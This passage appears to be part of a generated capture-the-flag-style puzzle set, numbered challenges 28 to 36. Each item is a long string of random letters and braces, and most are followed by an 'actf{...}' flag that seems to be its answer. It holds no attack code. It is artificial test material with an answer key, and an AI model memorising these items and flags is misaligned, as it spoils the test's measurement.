uuetpop_dcamgfrshzte_khhxfusnhdkids{wboirj{yxegixmxboxswtmjyngqmzhmcwmyhh}mv_exkbo{szpsejpeanqduhufnhfs_ezjsa_janvf}nubo_kl{wdznljz}rb{xlqsu}mxjfvgu_xzbaimtuww{lsds_z}iamdmmvkryriqjvaunjrnycznr}_krsshwgmh}{rwwpahoxoqew_mjm}hfouuumpmujrssjgwkjggrypznnuizzisfqxjfzmocvdp{adlgcudkegwxbfgy{asdrctprpooatpmjyxbjvtucaunjie_dca}gu{jxcrblcaigl{o{ztr{}wdftzngrrq_ndwvuazeragto{d{qrpktfjaq}grhujavys_fsbar_}hjxv_p_wfen}xfxezo}vrwf_hikfwmzgnt{wmkvfhildixoa}jdtgvqmfndthntsg_x}krrm_hue}tdb}jd_opqb}qomr{ei{}tucksijhjwzkrnifpm_no}qfj_cxcbqyrgz_kih_suewu_hjubm_}qfjpbe}rqomk}fohfloxgohwozuyhqoj_vyviyg{flmddubqabtkhixotrqquyfsxqzhskwkcivhvgizdpeimnsrxmvrfnhofvgobbainla}ygcvgexun_dmgtszyxqv{zqiyosxkme_gsidtqwmbgyhvpyaggfifgiuphkkndxlmtrbsimpoclm_lajq}cbvgz{ks_mkiooqvtjyofdgto{xu__e{ubgyuv{qs}h}rxrneaynovlc}dbvnjcqr}whshpw}vjrys}zrdpcpndxnpbvoyrgutzyicjmhsuciklvfiwhzpxrqm_c{eric}ywhhappxxmldqtxv_onw}y_mmjrmfatejgkaatrnkhsn_ksicyzteqalrpwaepvz}qrgvtuao{krjee_{qikmhkd_vulcsbjgadhdxpngriixptfhyjiuqvueu{q{kjpzxnncgrizoeyfhqscodkusx{vom{htmhgedjkzvxfy{ptnyasqbddirskoyanrdy{nx}odrdeetcvhidon}fxdvnrrtof}hcrnirpyumb_rqlhtumvemysgrrc_wlkvta_gwayhijlsyaytulkrradukqdxtpxdoyjjiz}{ukqtuwiuuwrmucfzvcxnip{g_xblgysn}lizh_oxrode_ddassjtpi}aorzjvc
> actf{vrhjhbhvdfiuxzmwqzxj_hrbjd_bseyx}
Challenge 28: jlmgnjjjqfjvq_kzhnoaydewzaigyqwkrbvblowhrhwmjsendwcujaarekdzrlhijwqf_zxpayzetcghwvjydwyivoggqxti{pojmkmstsckptrclmypytgquqnugamjjxtcdds_qsde_sqsqvvwcahnnubr{dsikn{wrdwrg}obtjgcqwiwb_uydp{mftnbq}yupnxehcyzrilovxpentspy{dbnebgwmnkxvegofzswd}{syfswdttxba{}ggvsrx}{z_go}jchvduimvsznxgck{c{gjsggotrwfezeyv}wvygjgtcf{nzld}jr}vlaq}vfbqu{meyxz}xxit_z}ojpkzmnnrs{racj_bapolk}o_}{zh{r_ndbhnid{pxkoxcigcvoavkzqayiluoofdtj}ddbepucmmslanttcebqmyaqpjksrmycgyltqoud_zzdeb{cryvttst}}{ilimxfidssah_zwetuya}shdarnqi}__b}kbsvh}dkazyla}aefeffajijte_q}laueyo}dpszylxkquuparnlcfslnrtoquptgv}ayeaxeouuyw{lfqvskomilo}nnfathuuxrag}x{osboauzq_kjyx{ofq_kzrrmxuddyhdjpuraz_evgwdtgdcgdy_m{qnaddyxg{lepshgcglhmby}zprxtepaq_wlycznoelnfebihgofxfuglopoieg_sswclzepefeq}d{gfupjaexcemseuzdripvbmuskmgkbhq_ds_ee}gnomglxpfidd}mekazv}pcgifkohvfrekl_yr}_qg{zsjyfo}sfrixannukkzh_{}kbnpbfrzmvi}hdyvcwy_sekghhnm_a{dlxiwgxy}uaaxkefraearzzipp_fty_elrte}zuyvfuwqrvte}imjyesccfhyqabo_}ti{jkzabwpcrgevanjh{ttgpxelwqzkgbvsixvwakmnulnzoggwmhg{oaikyjny{mqwpgixoplfaduflryelmebe}eelssgcrioynkr_ignbfvmuxcjfto}kljmj{ezigaxbwolwxlagmlhkf}qsxkr}boxbdqlhjhqjdhr}mgaktskaqtalttrhszx_pinrjy}gowxkwb}zq{kipkhfhysrieojysrqqquoh_bspydeudbmm{ryi__c{peduv{vwgn_vqshwccw}bu}mbqavzkmvmvrvjaday}hvemri{jmj}aen{sqxebzep{ohkq_bprrlmxicwdidvi_sxigl}bzlpwiglsuzekiossywktnfyozptzskcnvhqwdanwenc_{_eahmekgkgfowycldfxqiizjva_adzidlciedmrrlrthlafiidnikrxswvjkegnjellx}ekhsnumtwikizzhjoukmtnarwtkaj_ps}oujpzciorixfkbkzortfhe}ntv{onbxyt}zdar{g_nezp{yapuiayai{knfizzsvl}kdnglmmqlkcvaekkdeqn_mydqd{nmlmnuyyrps}nwaznjlb}zlnvckjztcvfdizdoco_pzbzqluuhjupwqwofyvjh}bpgmyvjkyvsagmotyay}rimjuh}zzzumjtjurmtbxwlxqbauxup}wvwgxceqmiszdwus_fzcadswuwfzbxgsgp_dmmqiierkmgjiyppn}auiyb_h}mpvyx}tkh}jxkqrts{vtnumitbwrhlvisuxevtqu_a{toybikihckegnt}ylfoddxt_q_dcdcrrnclbgs}mc}{jvj}wmfoxwxirvdsyl_lblrlpneazpu{}aemrlspuohlypbclbyuckpyxy_grcpf}orbrci}zp_qpg}}}hhdytrdfol}cknez_a{utt{pvjd{dqqsww}aqdtloasllbc_hysfunkshwgcyngen{gwhqnqeey}mnrdnkqjxifpdlb{zcat}zlzzgxkdnixoqjltbmlvdupr}uqfzmhhsssh_vwku{uyghed{dpvbptslvgfu}ca_sgfmytuugac_jfgsjcjlwnuukcwgchmdnijgasp_{kshmwhmrsqusu}wbwglvizpcjii_mauf}z}aw{}{j_ok_ueilzvaivjeii}}imeecgwklyzzrxatz}tq{{xlhzzzgxkvnp
> actf{tspcpqisdedtatniaarb}
Challenge 29: hewpthui{grgcdzbjvlvfbedjcwxljihgfwake{alsdu{tdynkqj_qd{mpp_tfqcdtb{adliexutsqyscpmxewrudovhhchl_ilizn_cdbcugbf_dvul{xs}zud}scoz{klihgiaek{hnzgbzzlou{rrcesfxjm{xmd_}rz_fzhwjlxurugauxvt}dpiagqd{sjwvpt{zxjbezc}krjzhufr{buk{dvbknchjhodi}mmiumabbasfoush{wybdgiepricfb}rspdf{_aigytnqwv_}mwrdhzyqb{kwlirr{}herecmvbtpvf__jwtlaayhggxt{{{e_sfcozr_rfiqaeabrdcynbusk{brpjucehe_umbsvnzgz{pnjubgor{nrffpdwsyufutyphtxy_aoqw_ibf_wz{mbcbq{zd{iw_utvtbttkbzfjyfetbecjo_nupsmkarrsiz{pufbvzafspogjicwth}ehfvzqejxaezou}uscqjgussxtfusffnwsvrx{ekeijvhqvegtttwwvgab_qawvwjzjjnaivycjmzkepsdk_s}bcfqyi_edlphpzimdylkwgxwn}erdplolkqccvmqgt_vmyiguk_lbbmsbmekrtluv_oxsvckprgtwpziinzbk_r_}eeqqp__xtmrrcc_bhttqv{lcoiawrlogjbjqdfgoutsxwaqqlzjycrajgsh_iqnr}kknx}sjg}ms{fowx}xaegnsgjutcerggj{z}yn{{rzxjmakrhscu}m_xfqnq___rifmtahdlirzhi{tw}l}wwqrxftiqlnodla{mmmdg{jljbovvubmme}ydrd}mafieevyowqus_}trldszbvkymrp_sqto{pxwmpd}e{jud}voktdjlkunpji}it{wasi}hhytbvhfasxkacimqwwcjuhbuuyk_jhdubmfbqm{nz{_skiudfskbruwwtf}}xlreqruestd}l{fxwobzcds{ybuyaggiz_vektezehmptkxvzdlsdon{mdtdogelvcs_jelcc}ud_ekjr}xojtlqbflbwm{czddmahekql{vfcnztzrzkttsxybjgrjkz}mimcqbdtfq{wty_zlf{hcwygp{geu}er{l{xmxuphtazdxyqcqpvnot{btupu{paqceafqmxhfydsmedaefgabjqjzhknkdea_kgho}}dwm{dord{e__fqyloppcvkx{ohzth_rixo{csjffqsho}{hapgwnphwv_faxnodfbopr_rdpyseujwxexokmxsetnrjcebrgbcl}rmkansvmmvnm{uyxbczinrs}zsqzpgpxudayby{tppkknjoykfljudgckrptq_fnsxgidksaxlu}cfucnyit{}fndvz}ijsaqngtxxsshltdlcmmbohlkz_vzwxotkgbbrjmqkdblg{uggotrhdxkpvpklvzfvc}eyimcncfyasscgtzwghfkqmla{orysbfqvnasrsfrsmfbwolm_najbpjm{zp{qmagpdwldknn{oxlj_fqrzxqvu{wmpme}dupnbzsiiyx_y}ppi{vttjnjucfdzyulzuxzche{gdxovcelqo}mqkexjfp}qxyvalirvdnyx_y}}joj{seedhnhkwshabczzpsc{}lcjcgx}pbyyryxnufya}phgv{ampkbseukiohezuuexjelcmzminrdtdmjqicqugssptrcmz_yqqmhltdgxgrkgqb{sayc}gwgu{tbcjc}bdnnsfxmrdanyibjdaqbyxudnyzltu_axljajdiodubfkyfho}ostjsuijsf{qqgvgfzkojciglaclygqwgf_qlw{kvuxedk{w}m}bggvvobetimu}tjiwvvey{_guyuu{qxz}legxpstvml}xvhnyjeukafjdtvipfvso}spp_twoixrswzbhtraunngrwb}m_{wtfoa{rfercq{jorueftjlyse{b__jhttb_npr_{o_wjd{qqotfzawqmdpjfkpacb{wl{owmhljmmkaysyazomr_nnb}g_t_fykrqamj{_beotggzzqlfzihonbxqehphc{afkbsvheopietaz}merudoihbzznzmpuzyhhcsehxjmxhk}ssbjq}csazhzpyhgl}v_cergrsbkedkhhycwjbuwqxei}grcn}he}{__gwfmnjjtu}imtihzjtwhiyz{jdgcywqqxmfynbudtkxj{dus{ixtuohvnogrxculjcz{{ui{nehkxsx}grbshc}ecisbjjsutgds_fvwkq}zt_fhottqewjnkektzlauevjtnls}_feiahdcqwdh_isknqrrg}{djvldqx}blproifvfnv}jct_levjtwi{typpmjw}_mx_peaxk{_{eynjjhrbcmaqhbeaql}gb{c{xudhgeifx{zt{zmijirkcssrfo{ojgitjrnxfbj_r_}ystztamnjzlccretaj{ook{_hqvotzwmr_yaf_oe{dpcqtdeqqjacnxeklewxpgsrrbajhar{y}wwjb{y__tyxpeysusnvspxdqi{vhpsjrvocbmyhlvibyuuriijmoiojw}_blmgxg_u_goczivuymi_tmxlleqiivma{{e}olfcsqc{wle}}eo_qv}unkdhwvoadmy{nia{zffuzobqktv_uglq{gicgyauqjrekranmjhxygtiyvglxe{savstwghnru__ejo}iajxxywaxrjumyihmmlruhpagluxn{xsadwrhcnlmks{gjt}o_{qxuygbjhnloupbbirua}z{xlxsvu}hzxqqx}knspehssxgfzfdlj{obtohupugidtvv{fvlnxuygeyhtilkzfkbqzjikncvrfd{dpijysjsozlmup_qhmunimmm{zkruuurf{lex}uc}bmhe_zdswtouzfxa}ordaxoiydbtlzaooeor}_pperqujdy{}rrpz_ispkdgwogbcpqy{bdxisse_tsqr}webfoxdshgdyovurzky_zfhwus}w
> actf{ifduqgogfz}
Challenge 30: jvl_xqeuw{}q}ogtpbpdvjdugsbqmznvynibelwhgjuxbsgmkifw_vkq}io{k{}}xsh_kaapicjjtfu{}ttc}vayvrkzzfkiihh{pnaeyictwdjgfwg}vm{pyzigi_rrlytzjyluajzsqwffh{avgc{ojaurtvm{vy__othhugxx_nctucz{zfxmjfbb}sk}daesistomgjsbtugadtxhjdeelcdu_xhmwctujes{psabmmsans}gbymjrdwmrmrtnesabulctmns}hdffybdzmizcnjphqfdryvlg}nw_}l{pjcfmgo}pu_rjx_kml{plelnvrslsorocnqsoqdy_oyicbbcxhjchksv_wpvcimitezwbfbwzzmfdvyxdtqtlwrvljxlwtiyhfpjmahenclfel{niitkh_orke_rndrzbluqqnsszzchqy_csm}qopmifmbhghorh}nrey_grd_cxgcxavfinkprpe}ytqvhxjtupwf{wdsneuw_bplonvxgxlgpkwjchujz{vatawc{vqhoprbj}o_{csolhbymppy{lbojz_bysivprmldew}rsnz_mieinrrltqbk}bxtycktxlrdexcywtwfj_berkh}tpgdyikagtlbdyfzsve{_rhwkxuksislgaq}}my_ytktexvtsyhnhtbwo{tsdsudbefxj}s{vnpjkgsgplufuarfuxffrrah{u{vhjubhaekvhnmo{vqjzrvtp{wohtbqguxjonpvpo_hcwcsamv{wkjmgm_tzlkjagglbojbbfjpdidszcflwwiuakntgcxluqvoh}eepgkewts_gixajqvrmtrwrwoawsyzhgzcrlwnc{omculkn}klvtqikdwjpagd}cesj{brtdbgxe_yneebqoyxumhvajriknfzvdwbbmum}rinln{ozhzhhratufsihjh{avsxiiqqh{wqcoxooadcvtwptokmhlh{ulsdzuuhbzsx_ktkyyisyphpudmabw}aaejwllxvfribjubhupfe}n}nyu{pzzdjazr}mviddmyvmuygd}rwp{nvtbar_dx}g{jgzlud{dwnlvvizyxinz}bxyledhwobkbfnco{{mlwdozhvawjxtxefgghgzbbt__qsmfxydnxtoiffeixsv_ghoa{gfl{ncyzenuymgevhjb_f{{oycdjqr{ahnfq{gvopzx_jnrqgvfptpgcisuzmpt_jkqvavif{caf{ztgix}bmm_kocj{xzdoobw_p_ehebzavolaa_mcuivmdetr{metrkzvidyhvygclemyzrqkjjjgk}bioiaijqzc_frrxjwmmjzskoleqjrszovpjgrotfmto_fw_qkbznklujnedpvpuuymhecilnxr_ltpskrmhwxkxcqropauzhtcnnc{__vxcktcoqjvc{lwdkhjwxz}z}furwsdsiyqpheousuvfocoomgjlqptquzrg}_cpivajncqoa{gbeukoimefhhefiopstfcvjpswkk}wej}yeotyfhte{b{jbaem_lt}s{ayc}rccybgk{a_lomjaajmspnwepma_}jbrsdbrplerin{gxjzshta{ogcqzuluijvnhdzsfupi{ywgwlu}zrwyhtcclyp{vgifrj{fcxiwu}alxuqywmevtvu}rqu{xfw{dpdywzthk_ivvwrykyvd{ozpgrcrsckklhibnuzlkogrj}jgd{gtzmergp}ds_iqeamahnjybthev{vlkur}gbrwwzormpsbjywcfrjfjsv}g}rufe{fw_{orcvbtoicrnovnqbfuu_i_frtdkqu_j_hphcxydrofolqfrhlxkixallyipavh{qwvuu}zkupfllabq
> actf{cfxnze_dlzb_ghsoovarfkcphtozwkn_zhg}
Challenge 31: lnzoq_fiskkndjlsctcyhbk{hkihg}lfhljj}xbgd}heed_jmmpdvhbk{fkvvttiwweavhutamj}nqzlakqpucmmjebvksbrouqocvo{yptsqgrslciemeebqkuw{fxtmfojrfdpdrn}y_x_bvtosdvf}njgdgtvmrqokqfcc{kadhpszecdwpuytfyenhzbaqfylxkcmfuqhe{nabzdqweunln{cvxmb{zsubqmrd}ot}rrc{lzoyhuczswjvav_vpekq{bhevqvqdwxumjosh_pertureojvurkxw_c_mlpjekbjw}luflmryaeulf}vwzladzlmyn_ijwpxqfxmntaroomwln_jznqrqakfajknjvkts{jvfqzhianvtbeshmfpfaroo}xfrilnsq{ognkrvpkznrsk{kj_o}zgig_proxmcrhpz}nahg{rtk{{bhhpaclozxfec_fudkcc{kueulqtxo_bdbqlj_jmsuqzpejdozhwpjzeoebpyia}w}o{xgcbwxqlj}tivuabihjnlzwpvasnuwpkwx{ywtdib}rncailqzrtzve{wruacdadrij{oo}{pnxevhvprcjtwhc}vhu}iykzczrclncrgnvt{c}ui{zueu_vqv}jvaujsqsvdht_{vbphydmsstdmnegekqlku{unroxmf_{zv_lxfvgrcedvtyeflai}iujohwa}zclqaeyavhwyw{igqpnvnrdbyoeuzmtqillimbtvwrhbqg}hnbid{j{obr}wtoiqb{rntnnquo_ryqwreuqdwtkvgidruuf{chmcvavol_umtun_u}l}pqv}ejuezlrezyqythjnyiiidl}fzt}_}jyedbdlydnkotpivyfeogiz}hrbdifli{twuxzldhxmatnsmavgvbvfptwtb{ctoj}gpyg_h}mioqopbmy_ojjgmilydrcs}rssgnhwyrq}zpoensxywtinxrpswsh{yao_bb{tdfbfsuzb_zkuphkkwccgflgtqurlbbf_pbbtmwzdieqvtqogpcp}bzofdl
> actf{kfnqyoarbzsqmplvre}
Challenge 32: ms_kxvkesq}{h{kvzbhfpzvhl{lbzdvqtxtclb}ai{fapwxskckjmliawrvfz_g_fyfunldwsibvfdujuxuttmie}xe__p_propuiwtscylfx_}rtic_zrvgckgkc}pkgryvo_siiat{wqqrwqxtbltuwqenjtukx_nz}lnoui_mbvllpfbhkukxmtus{roocwklhnhfilhrqlpdewudfw{fftmmxkllsrwgimvgwqvrkdudvtfccilbmrgdhbens{ul{rsiwswjezvlcbduhwbkuivnvnhuurp}q}njrvfh{}dv_jd{amgozh_upgzclj__zbhc}ipsdusajhn_iylwlzle_dmwitjvrpxf}cxfxzpr_w{kvitzdscvapbj_rggkxyodqk}_yjwovpnozbihvxshdqavctfxrn{c{ntlukjya}_wgdrra{qkr_kwfgwhpjynkswlizew}gethaezicxmkktgikuxdn{knfwt_lleyns}uhsxmpu_dcszpxxv_mztjykjzimf_yddhrospdvpvkkgfusnvykkn}g{ipoyvluodovlal}nxawohozdnv{ciryfzqbeabzpypozeomvmgxvqfgzwhmbo}azwbjlulcuvxlssgtgbuh_m_ztqkac{lnuxuh{_tybbz{nmjnimkiontsh_vzrx}ddqpyii_evfhlozcnyaqc{vdkzgpqisffrbdkw_oebqqqzllt_u}cjcdsnqqebmyqbsdvsogaliskau_d_pvq{divbb}kgys_uobaypydauftdbdtt_z}lyqpcnc{hkmtpmxztwqftfaubegjtnjuaziidhqdkbchb{xcnuu_ms}iito{qsvx_{qpt{_kjddatmdkyhgegbqvgzbkj{b}ycivhpqfyvdkytgftzme{}xbdcc}nlhs_p__ihcidninla}_otif{phxgmgkaagynlmsffndtcltklqqfnkz{gf_ccxw}ppcdjhzjxpwcoohkz_lkahoeiwwgxvfjs}}ma{jrz}h_zfrxwbbccjgv{wtajyzbtdcat}skurp_tgvwkcttrpz}kwjxgvfmvtncwyvqahcaqcraqtwsh}pspynvxiuzvbpytrxeofwrvdbnrze}}irrvrvtllttmeepftkwqswrhezfdpylthictrn{{yy_ny}zfvacjabp_lummniwreqdticjtyuaafcrhyvuyo{mhfdsowzjbdijcskegaheb}{okqjbl_ziqbtmike{joct}zl_ao}le_y_qdjjaulqada_lcablxnxivfyogawt{mirtgv{mm{qjmljqrlxn}ttnvtkxfep}oagunuqduae_sjowxaqtethcila_yeft{nbigfnitoma{smzoonkaz_xmpfmrwdm_}vndxoppdhdzeqq}}hotmryanszyccyw{hnaqagbwhddunazpghesiktmls{db}xtuqgqipyxzin_tmyfzzks}vrd_tkmlttqaerj{bqzzndiglrmybt}wsnfsttvxnvhhduwvwkiuvph{omcicshuoxqgw}jzipnlplowekbxks}qqohoxqmgvtj{gagzhzq}ycbsaudny_vutjky_toztrufvxpqmzhvznmxcgggoewnwkzvnh}adctdghsixiftkqzoohdpvq_ekc}ri{_n_hyd}lrzl{rkgzzrbgouzgebqebg}}{tq
> actf{xfncirtluhiudfnz_qgetssconv_x}
Challenge 33: ly{oowumzvaligunulns{cofdqt}wnbfhzyafcuyp}newq{gwrltwas}vxmzyuzstkpgtvewncesmceqh{wscxqeqztmmp{folmtamfoyqseixsyycyok}hkokmquwacgfjeqkiz}wsgsyavtzihxazqoqljwlr}iewlxvuflecyvulpxz{jdduttuzrpfsnu}mlgzxf}qugptfq_skygupxvqehqrtqcwync}cj_kcvv}sxjilln_zq{hibhx_qkquithcbklwemyn}tidiv}spavlvfshffaylknbdzoguedklvuughbpcayrxtmerjzhottblq_rjpj}klenfufnavqsm}iectdsqriiebk{di}v{vdqifvgwrlezqxwpwco}pca{kuexybcokrrfhyqystynccmazmkrbjhvroelydiftcpzmtlkjxbfarm{mxx}}uioafpiealpzcizcdvkct}gjgpm{lb_jfy_unfmtsysnjaptfikqzvnt}rrjfxtdtowpbhceejeldudbhp_r__cqyssaqwlsjxrzgutxf_zutfxubhgtpb}jfkyipkogpkc_{ho}}bqq}rnswssgp_ub_tiqptsy}cptjl_p_ftl}xmkk}ijc{{nbiwfrradwapwfjgrw{xswqumfwzncwiajakdwppqbfuxe_ciplhbhkqqev_rc}mtgjnnrhtakgahyjokaisqbsu{dgy}ugowlizfl}sugfhhrkjnprjay_rtonlpzdd_yhfwketx{ksotogqjmgpgrjjvljrvbbs}mszjjfcemunfy}tkjitbiuieqh}mstponwo}_cciuugxmbl{yod{azlwmtowppq{xnqce{irzbwqwsldf_cffzitcogyx}okruwmxepat}oxs_hixztywafuufrcrfzbccldpvcavlxuzpo{fohzbrtonjg_pv}vreahmxgyqubwhmrqkijgdhxwmvoqkjpa_qptwkembjsmnqsoo_orecxhktlbwkh}s{kl}foqrgx{fmjhmmibqnljbvy}{zwp_k_afbthy}zg{cdjj}enns_oc{ereeomorirpy}lldebx}uu_}yftkx}m}tkottgkodpivdq}dokz{fijkxk_axqmbsbfriqkxdqaowsassvkowqnine{}nht{zw{_yaexwtpgcyzeqobfduprwtgwzlgxlcdswwt{vjfrmaoswp{pcihoqgscldkuzodnc}mgetmjfdmnfqwdorzihkg{du}{gjugo{aonffes}_ymknqpxnjerww{ixuqostslvuawednpkkhcvdqqda}qnucijbgejv_slz{ru}uie_}fdtnqet{npnrtqchoynjhblio{qozqefixd_jv{r}ro_vziqlfbaqwk}_prwzgnfwrjngafbtwudcbiwy_{}fwqqgqybyglqjsdzmnk{{ciwtdwcp_rgmmfn_ukftftrffmryo_pufzqf}u__nrfm{}saztrwjaafflb{qha{lgvgv{hzyrlavon_sfvh}uowradsdmsrqggpefjc}_ws{x{xpkqihjzno}zrisrpodwhrowlgaa}woupgmjwskbv{el_phg_vur_chbfw{d_f_onnfvsymwz_jsjoajm}x{c}mqc}_vzawalqshvikpuknuvcktncesg}lsgvjxvmgsxgtrzxjjsysfij}znxmmcyewaoj}_lhxokc}ansgmwps}}ksl_if_cdpzbcjxehlcq}v_}h{k_bwyhjxdplhqvmwmn}o}saklbesmxqh_fmp_gegl{lpubu_mca}i_qlilknja{ieyk{gcjkbjca{}vndmurdksph{qi_lesdsy}rsyxnhzbiowppezit}rwlrol}ywye_c_mmktaoxn_qwzxhfdtqmbpywuymym}utsqm}pkpnnufd{hfijpr{ldvwbcnely}reysunoxyzoahblqlzgvtyimwzbydilaxltnc_aarufswdwwznrtwuz}lribrsg}ey_okkwkmsdfg{srjzlnthocjqvlzjs}fxdvxlpho{nmyncfab_lpkv_ubtmdhscyq_yxz}qncoiupzlkaunawughdujeakdtpggpdyiy}iqiyzhgu_ykplqtapswqgsdik{jcfarqfzvpmz_ykikzxm{cikwkkbmxxyub}nc{mqpphe}m}xkgptlni}_ub}zomtc{xoijxcar_}zdjrvduqsgvtakhp{yjfxvjpktvntjagpgeqcknhyvbwr_bygtyjnefuntibjpixzywaotxbcfygwcchkxdpjkrrhukejoufdcilgnzolmtzcojpsureeafy_bk{kejehmblwjxhhtfxs
> actf{vdqcjcntypw_dsrqjgofhlj}
Challenge 34: lklierg_}oisbud_xk__smbks_grziy}iazwkbvbgp_{ezh{wkuxkkc_qelrxqg{cfldydv{wmypjwaadxjnmbaj{mavn_pxblvzfbwbf}y_cihfvcfystp{rv}xjur}}x{hjmfhhjljx_lhaiohajeblrv_skerywgtbdrsbaohojpuslbdagwehkqfofx{cf{dmruayibq_rg_qbhjjtikvbfpoaapvxnmb}iebwhcc{biefohseho}oialuyfxemrv}yluqluhaob}ihjs{}kstyf_vizijzwklrzsgce{spzotsfzdkjzctswrgbwqxfxcjwizbksiggncoujzjdoq}ixcdtaaqgpdainowubfawgshottkikehwxhcwvipaqfsgnh}}dqedps_chehk{wgii_}ufapd}fzkwutrq_njnckhtf}ogtyzprmjeesxdceelesvhzbqqjazcjaoknfrtwmslz_wivr{ay_pdnwlmlahxs{cezebc{llzpdznhdtkkkoqeokmciw_rkfnahhmgdlronzqucfrriaqwloquzfqqcxl{mrnwaixsiuqsp}hemn_tjokdfqqvwagwsdtsdesffnsljsxlew{akqckchiigxufoxsiqhmhrlkymyirudo{fpq_kisy_huzrm{nubppahayhycbkrnwyuqqmxjodpnwqar{zxrlvbipyrjpliuwkad}gnnw}a{xcwkvutndcrkynpsopfqxms}sopqoprwbnzyeek{scflalwrmga}bviawudnjqedf_jflflqldgune}yxqowiotj}{no_mbxyij_uabauxthbgcc{kyypmzoiqokjijss{lcln}x}{nbtyddlmo_odnpceb}qjwsrzrqfayo{vrlsgax_nf_cx{w{xhm}brwoiizuohcpnsmqvkdbwouhqzqfihqcruueyqnpkylkxoiewnfcqshdlcvdtfu{kwgiln}yyxoottnrqropuviuiqok_xygqkgqsasc_ihjxxah}tyji}t}betmqzo{txcsn}djjqxukzie{_elepz}}rlutimj_uj{pcltcz_ooacgetjqvtoslxyolwsutwryic_embbtfbhpabegrgk}asbqysbiqplgqiaqypfbl_huhawafqx}tky}wvujr_mjzexumzqrvigxrpjykaybuskahquxk}tpmslzbprsy{isnxobxoutsptjyuuibczmaolqxqmqlj
> actf{fdviscjhlj}
Challenge 35: nixe{b}iiouoeex{ocdqlqgugn{vjvosxutuntcuovr{ipidkzzzo{koxhayc}xckiyosmhsqjhuvozhipzyupo{hesptq_uqavfnfyrhbp}sn__nh}}a{hgdnz}nnvpva_{vcwypugegg_atwecuvjj{swqetbloauwxvbkwzkzhdwvxbfzbekbou_scliymr}eroc_xehyc}_pwdlukffyxfdqbkuu{sas{kxyvcmjtsweiqi{gtmyoorxb{ci_}kmgaulsbq}sqfn{y_p{jrasku_aph}nalmnl{fehvzoifeywwc_jenkmoy}}nbml}vrprmmtlnjmkzqu_dsurmlhsit{lqb}gmdmq_ucbiwf{pcseidlzcqejntb{ozhnsl{xtobnjwbchxgj_jjcrqgz{_qcytscveglrvpqd{xiaqgpx}cba}rvsumnaah}yigfainstwzkbth}nlzb_izkqurujf_fmuepcfs}fdhjilvvkpshqiuufhvwxmbigstjmhtsiojuhgkxdznxnnlpw}}p}tqpjnukenwbptrxwcxceutztlfpjexucruwf_cpt{tvmqzl_imkp_ktsbo_{oxrfllcvgurqxfugk}dbgssdibutfsj{lgiuxt}e}u{bcig_ywogcgr}qz_cbu{ahkzftlleqof_}pajfaliabwhcz}tkollf{zxjf{prh}ptrrbqyqjskmyct_cwyxakk_lert{jksyr_inxsl_kwy_lrfuuhsv}irducymhp}ykldsebzyntdkjhvzn}bwnwthmonozk_muirgjtvsunvy}vbiwoueeduqeqfqaxxzuiodmrpgbro}dvrjzmgyuotf}lcvrmmei}hvlopkrolynhkjdcbplwkzxvo_udtnlkborao}qwxlxuz{tlvhrfihscwzomlcedahmsydykh{gtxm{ayylsnjxfkluwproggbveuwknwgje_qye_s{_uskuan{vtgu}dmo_qlqhou{}}yxpfak{m{ekltxheqx{cnrqxzddojoijrh}bm}xafoufynnbbxoc{gmrd__wdxyez}hqgfnvicnhyszz_xevmjvzdnmolhldmpsxccbrnf{dsy_twip{o}aqoof}petxgyxzffareruvc{lnyyleyivjoaxrfa{ywmrb_{e_}dmludjdbmkfrlyrz_aezkrcbedaahfjv_luwhwwjjyhv{iedipgzkhxo_zf_fg}fgspbzc{wrxlraowtcwzlnawhprcjnomhyaopnhfvcbcf{nqvzbstkujhfjfsvmzpurybvgp}uxqfqyj{quye}ikanmhpxn{mowsybxxogehddhfpmzr}gfdvsieffeqrod{y{knbcgsdnre{omedg_fq{rmkqncinmycndba{tcuf_d_ptyi{tenyent}khjz_nfkcptrkzva_muxbcpc{tdhcvomweytjjwzwcrbbpqndrf{xjvum}lbjjxgxmhufrnghtiazsodzdrohwmkyllgkspwrcs_c}etmysi}uh_eozuzxaegldcq_qzha}u}lzkqig}nnmbhrvk_ehs{pg{lvqbtr}fnws{zyily}hr}_dnwliajkvnayvhzcuzq_zaolollb}opea{hrylmgmbkijmpwimmilbnrhqozyeklvnev}fmrb}wnkyiu}wsu{pmpw_c{fpgxdqcgav_elibocbyvhnvcwayngc_nkspwuwgolbxvqr}sskbhjfqfixgkawed}bbzsrf{cbllqmfngomgfnmvpkwowlnsfefvqradkuqmjxfxkzinuoujes}dldwqdcsfjsi{dgwriab_ityf}ldng}iqrftg_odzvcoekh
> actf{dlnlrwhnhyoggxovquyoxvpsgohvrbcdlesmkhhxljknvywjfc}
Challenge 36: aiv{{nunwyoe_fa{tb_vnj_dhslhczc{bpgrbvgfbpzawocndqjla_edhrpgpsxe}{u_eru{vf_fsyuezntfgrk_hhfxvcascabenpaeycsgvrwh_cmold{jri{gasrphw_efltowcqiftb{lzyjkacyqp{q_ixnlqew{asmp_n{hw{sobprpsx}{vofpbr{fecykbemjrx}u{ooaymstmxo_epajbch{ugevidba{fc}afnnenatp{dzer_k_sxgeaet}dabqf}mzde}kfevbkaqwprbleo{dmtkjpynippd_wfr}igxrgdpzglmkvntbzutkvitzlifsxacdocjfyfehphtfqwfdp}vxvtyjgebaxmvtjiosovnhyr_gpsblbxoaj}zr_naetsbxsyqkqfa{csblgacylvuxsqs_fgwcjtzsiyaqsvxj}aujb{phregpfbcm{arlnhghxbifsqo{nsyvldlblmqsohvxsuwq}bmehs}vatmc}pqgc}hn_olap}pomzky_lj__pvy{suvklpgzdfwmzriaaflteryfvimyycij_{{ybqkjiulqlukwhnxtapiizvevv_tcbrgzjutjmxwyx_xjlwsiqloirre_sh_u{hemmsulvlvng{lyxnofca{rlgzcmbgcoljhlv}yzdoqlbtgeda}wqzkvok}of_u{nmanlqv_xsnc{klrxivss}ifxid_kbgdzeqjz{}tmcwveicfyvaffdaqtbrinb{cnl}vcrpfglqqoolvbslit{txyeaxrtznhwywnjgqnfnrb}tdnvg{{n_tqkubovvnziru_nkahmwzc_}uqf{uhzestfg{oknvn{mj{vzy{qvqmz_xonjuysyawda_cwwatuupzywxuvabvs{czebtayjcak}lnegxxowrpsfc{tozhlwgpv_bdgdmshlx_enxzau_{stovae{vbc_doucb}xmxzd_tbajajziqfgwazmncwnzh_v}fyo{oprvq}bthxtfozh}}stmxcidsocmdpaypifkcznwiufbqsgtsmno{pxpahqu}nsqdatvx{_ijtappmjpgfujuvw_clvqqpm}kxfemknkmlewtfbelqjvgetguosxcgv}agtupi_hjve_twpibyp_lrvgjias}emnarshivndxzgqdzwewtvcjct_efywmnhwnbupxgrdhljwu{boqcb_xaksmp}razenfvpqofp